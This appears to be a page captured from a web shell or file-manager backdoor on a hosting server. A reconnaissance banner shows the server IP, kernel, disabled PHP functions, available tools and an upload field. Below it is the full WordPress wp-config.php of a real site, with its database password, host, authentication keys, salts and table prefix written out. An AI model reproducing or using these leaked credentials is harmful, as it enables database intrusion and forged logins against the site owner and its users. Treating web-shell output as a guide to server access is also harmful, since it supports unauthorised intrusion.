| Server IP : 31.214.179.3 / Your IP : 216.73.216.84 Web Server : Apache System : Linux hostingsrv125.dondominio.com 6.12.96+deb13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.96-1 (2026-07-20) x86_64 User : ( 1156851) PHP Version : 8.5.8 Disable Function : system,passthru,popen,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,shell_exec,exec,ini_alter,show_source,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,mail,eval MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /hosting/www/thermatron.es/public/ |
Upload File : |
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * Localized language
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'ddb273349' );
/** Database username */
define( 'DB_USER', 'ddb273349' );
/** Database password */
define( 'DB_PASSWORD', '65?vfIK09p!$9KYf' );
/** Database hostname */
define( 'DB_HOST', 'bbdd.thermatron.es' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', '9Y1tOl1F6+#3N[aQ-4Hx&R%;Hg2UxP2[7K)R9%Acs-7!1bE9/azCuX(1G97I|r@2');
define('SECURE_AUTH_KEY', ';(_6-c*|6:U0o5Y7#z+mYvL35o*-_F1#-%jr@9t3K3%#Du2:Msp|2lCcX3:55yt:');
define('LOGGED_IN_KEY', '9P9l6uJGR82#za_jXKz;;Dc7wHO7:2SOhz@g21j1ja532:tH5Kgc9281#TD+Sd[c');
define('NONCE_KEY', '2S45ya*|!23rh_10X73oT90t5S43|F*3uGT]69C7[RGMgR)4xUn34509Aoy@u*6~');
define('AUTH_SALT', 'CLlmCxa%)L#J_7C%ph0x1mf(z-Ih_Q@GWW2#O%[6oPe9R#lu|4-0a!ZcZ%4LNQBR');
define('SECURE_AUTH_SALT', '65c-5S:Dzb#D21]7DM-8vJ!7zb_F7/d4&w_[J~pn(i96A11u(@M4pFTF@g3fj8!T');
define('LOGGED_IN_SALT', 'DMoP&H8Yp*B615xMZE9BpqxIJ16;5DY%RQ%+t2-Dj!m:1H)DWKgA#:#U;@_E@-ij');
define('NONCE_SALT', 'lU3S|0R1Y09kL~~g#KG2ne%|7@6pri~!0!-2**@aa)Y3wHw!qe1vU5_XIqeCFmr%');
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = '8mLjkS0_';
/* Add any custom values between this line and the "stop editing" line. */
define('WP_ALLOW_MULTISITE', true);
define('WP_AUTO_UPDATE_CORE', false);
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
if ( ! defined( 'WP_DEBUG' ) ) {
define( 'WP_DEBUG', false );
}
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';